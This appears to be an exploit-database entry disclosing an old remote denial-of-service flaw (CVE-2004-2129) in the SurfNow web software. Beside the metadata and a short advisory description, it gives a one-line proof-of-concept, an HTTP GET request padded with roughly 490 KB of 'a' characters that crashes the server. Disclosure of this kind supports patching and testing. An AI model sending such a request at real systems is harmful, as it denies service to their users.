Loom Software SurfNow 1.x/2.x - GET Remote Denial of Service



EKU-ID: 29049 CVE: CVE-2004-2129;OSVDB-34287 OSVDB-ID:
Author: Donato Ferrante Published: 2004-01-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/9519/info

A problem has been identified in the handling of specific types of requests by SurfNOW. Upon receiving specially crafted HTTP GET requests, it is possible for a remote attacker to crash a vulnerable implementation, denying service to the user.

GET \aaaaaaaaaaaaa[ 490 kb of a ]aaaa HTTP/1.1\n\n\n